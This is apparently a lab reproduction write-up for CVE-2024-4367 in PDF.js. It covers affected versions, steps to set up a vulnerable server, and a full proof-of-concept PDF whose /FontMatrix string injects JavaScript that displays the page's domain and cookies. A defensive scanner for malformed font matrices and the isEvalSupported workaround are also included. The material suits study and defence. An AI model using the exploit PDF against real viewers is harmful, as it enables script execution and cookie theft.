# PDF.js Arbitrary JavaScript Code Execution CVE-2024-4367

## Vulnerability Description

PDF.js is an open-source PDF viewer developed by Mozilla. In version 4.1.392 and earlier, PDF.js contains a JavaScript code injection vulnerability: the entries of a font's `/FontMatrix` array are read from the PDF without checking that they are numbers and are interpolated into a function body built with `new Function`, so a string placed in the matrix runs as JavaScript in the viewer's origin.

References:

- https://codeanlabs.com/blog/research/cve-2024-4367-arbitrary-js-execution-in-pdf-js/
- https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip

## Impact

Affected versions:

```
v4.1.392 (released April 11, 2024): affected (release before this bug was fixed)
v1.10.88 (released Oct 27, 2017): affected (re-introduces the security vulnerability due to a typo fix)
v1.4.20 (released Jan 27, 2016): affected (release before the next release that accidentally fixed the vulnerable code)
v0.8.1181 (released Apr 10, 2014): affected (first public release of PDF.js)
```

Unaffected versions:

```
v4.2.67 (released April 29, 2024): not affected (fixed)
v1.9.426 (released Aug 15, 2017): not affected (release before the next affected version)
v1.5.188 (released Apr 21, 2016): not affected (mitigated the security vulnerability by an accidental typo)
```

## Environment Setup

Run the following command to start a server that uses PDF.js 4.1.392:

```
docker compose up -d
```

After the service starts, visit `http://your-ip:8080` to see an upload page.

> 2024/05/27_15:30:25.85
> Pulling the Vulhub image failed; build the environment from source instead:

```
wget https://github.com/mozilla/pdf.js/archive/refs/tags/v4.1.392.zip
unzip v4.1.392.zip
cd pdf.js-4.1.392
npm install -g gulp-cli@^2.3.0
npm install
gulp server
```

> On a VPS, `./pdf.js-4.1.392/test/webserver.mjs` must be modified, changing `localhost` to `0.0.0.0`:

```
this.host = host || "0.0.0.0";
```

## Reproduction

Upload the malicious PDF file [poc.pdf](https://github.com/vulhub/vulhub/blob/master/pdfjs/CVE-2024-4367/poc.pdf) to trigger the XSS popup.

![](images/PDF.js%20任意%20JavaScript%20代码执行%20CVE-2024-4367/image-20240527152556731.png)

## PoC

poc.pdf

```
%PDF-1.4
%
8 0 obj
<< /PatternType 2 /Shading<< /Function<< /Domain[0 1] /C0[0 0 1] /C1[1 0.6 0] /N 1 /FunctionType 2 >> /ShadingType 2 /Coords[46 400 537 400] /Extend[false false] /ColorSpace/DeviceRGB >> /Type/Pattern >>
endobj
5 0 obj
<< /Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341] /Type/Font /BaseFont/PAXEKO+SourceSansPro-Bold /LastChar 102 /Encoding/WinAnsiEncoding /FontMatrix [0.1 0 0 0.1 0 (1\); \nalert\('document.domain: '+window.document.domain+'\\nlocation: '+window.location+'\\ncookie: '+window.document.cookie)] /Subtype/Type1 /FirstChar 65 /FontDescriptor 9 0 R >>
endobj
2 0 obj
<< /Kids[3 0 R] /Type/Pages /Count 1 >>
endobj
9 0 obj
<< /Type/FontDescriptor /ItalicAngle 0 /Ascent 751 /FontBBox[-6 -12 579 713] /FontName/PAXEKO+SourceSansPro-Bold /StemV 100 /CapHeight 713 /Flags 32 /FontFile3 10 0 R /Descent -173 /MissingWidth 250 >>
endobj
6 0 obj
<< /Length 128 >>
stream
47 379 489 230 re S /Pattern cs BT 50 500 Td 117 TL /F1 150 Tf /P1 scn (AbCdEf) Tj /P2 scn (AbCdEf) ' ET
endstream
endobj
3 0 obj
<< /Type/Page /Resources 4 0 R /Contents 6 0 R /Parent 2 0 R /MediaBox[0 0 595.2756 841.8898] >>
endobj
10 0 obj
<< /Length 800 /Subtype/Type2 >>
stream
endstream
endobj
7 0 obj
<< /PatternType 1 /Matrix[1 0 0 1 50 0] /Length 58 /TilingType 1 /BBox[0 0 16 16] /YStep 16 /PaintType 1 /Resources<< >> /XStep 16 >>
stream
0.65 g 0 0 16 16 re f 0.15 g 0 0 8 8 re f 8 8 8 8 re f
endstream
endobj
4 0 obj
<< /Pattern<< /P1 7 0 R /P2 8 0 R >> /Font<< /F1 5 0 R >> >>
endobj
1 0 obj
<< /Pages 2 0 R /Type/Catalog /OpenAction[3 0 R /Fit] >>
endobj
xref
0 11
0000000000 65535 f
0000002260 00000 n
0000000522 00000 n
0000000973 00000 n
0000002178 00000 n
0000000266 00000 n
0000000794 00000 n
0000001953 00000 n
0000000015 00000 n
0000000577 00000 n
0000001085 00000 n
trailer
<< /ID[(w4f) (w4f)] /Root 1 0 R /Size 11 >>
startxref
2333
%%EOF
```
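The PoC works because object 5's `/FontMatrix` carries a string literal where the sixth number should be. A defender triaging uploads can check for exactly that shape before a file ever reaches a viewer. The scanner below is an added example written for this write-up; it is not code from PDF.js or from Vulhub. It assumes the font dictionary is stored uncompressed in the file, as it is in poc.pdf; `/FontMatrix` entries inside object streams or other encoded streams must be decoded first. It tokenises each `/FontMatrix` array itself, treating a `(...)` literal (with backslash escapes and nested parentheses) as one token, so a string cannot be mistaken for several harmless numbers, and flags any matrix that is not exactly six plain numbers. The sample byte strings are constructed for the example.

```python
"""Flag PDF font dictionaries whose /FontMatrix is not six plain numbers.

Added example for this write-up (not part of PDF.js or Vulhub). Assumes the
font dictionary is stored uncompressed, as in poc.pdf; entries inside object
streams or other encoded streams must be decoded before scanning.
"""
import re
import sys

NUMBER_RE = re.compile(rb"^[+-]?(?:\d+\.?\d*|\.\d+)$")   # PDF real/integer syntax
WHITESPACE = b" \t\r\n\x0c\x00"
DELIMITERS = b"[]()<>{}/%"


def _array_tokens(data: bytes, start: int):
    """Tokenise the PDF array that opens at data[start] == b'['.

    Returns (tokens, index_after_closing_bracket). A literal string '(...)'
    becomes a single token, honouring backslash escapes and nested parentheses;
    a nested array is kept as one opaque token.
    """
    i, tokens = start + 1, []
    while i < len(data):
        c = data[i]
        if c in WHITESPACE:
            i += 1
        elif c == ord("]"):
            return tokens, i + 1
        elif c == ord("("):                     # literal string
            depth, j = 0, i
            while j < len(data):
                if data[j] == ord("\\"):        # escaped byte: skip it whole
                    j += 2
                    continue
                if data[j] == ord("("):
                    depth += 1
                elif data[j] == ord(")"):
                    depth -= 1
                    if depth == 0:
                        break
                j += 1
            tokens.append(data[i:j + 1])
            i = j + 1
        elif c == ord("["):                     # nested array
            inner, i = _array_tokens(data, i)
            tokens.append(b"[" + b" ".join(inner) + b"]")
        else:                                   # number, name, keyword, '<<' ...
            j = i + 1
            while j < len(data) and data[j] not in WHITESPACE and data[j] not in DELIMITERS:
                j += 1
            tokens.append(data[i:j])
            i = j
    return tokens, i                            # unterminated array


def find_font_matrices(data: bytes):
    """Yield (offset, tokens) for every /FontMatrix array in the raw bytes."""
    for m in re.finditer(rb"/FontMatrix\s*\[", data):
        tokens, _ = _array_tokens(data, m.end() - 1)
        yield m.start(), tokens


def suspicious_font_matrices(data: bytes):
    """Return [(offset, tokens)] for matrices that are not exactly six numbers.

    Any non-numeric token (string, name, nested array) is reported; a string
    literal is what carried the payload in CVE-2024-4367.
    """
    return [(off, toks) for off, toks in find_font_matrices(data)
            if len(toks) != 6 or any(not NUMBER_RE.match(t) for t in toks)]


# Constructed samples for the example (not taken from any real file).
BENIGN = b"<< /Type/Font /FontMatrix [0.001 0 0 0.001 0 0] /Subtype/Type1 >>"
# A string literal containing an escaped ')' sits where the sixth number belongs.
MALFORMED = b"<< /Type/Font /FontMatrix [0.1 0 0 0.1 0 (a\\)b)] /Subtype/Type1 >>"
# Wrong arity: five numbers instead of six.
SHORT = b"/FontMatrix[1 0 0 1 0]"

if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else MALFORMED
    for offset, tokens in suspicious_font_matrices(blob):
        print(f"offset {offset}: suspicious /FontMatrix {tokens}")
```

Run it as `python scan_fontmatrix.py poc.pdf` and it reports the offset of object 5's matrix; a well-formed font prints nothing. The check is deliberately narrow: it recognises this one injection point rather than every way a PDF can be hostile, and a file that stores its fonts in compressed object streams needs decompression (for example with a PDF library) before the bytes are scanned. On the viewer side, PDF.js also exposes the `isEvalSupported` option on `getDocument`; setting it to `false` makes the font path generator avoid `new Function`, which was the documented workaround for deployments that could not upgrade to v4.2.67 immediately.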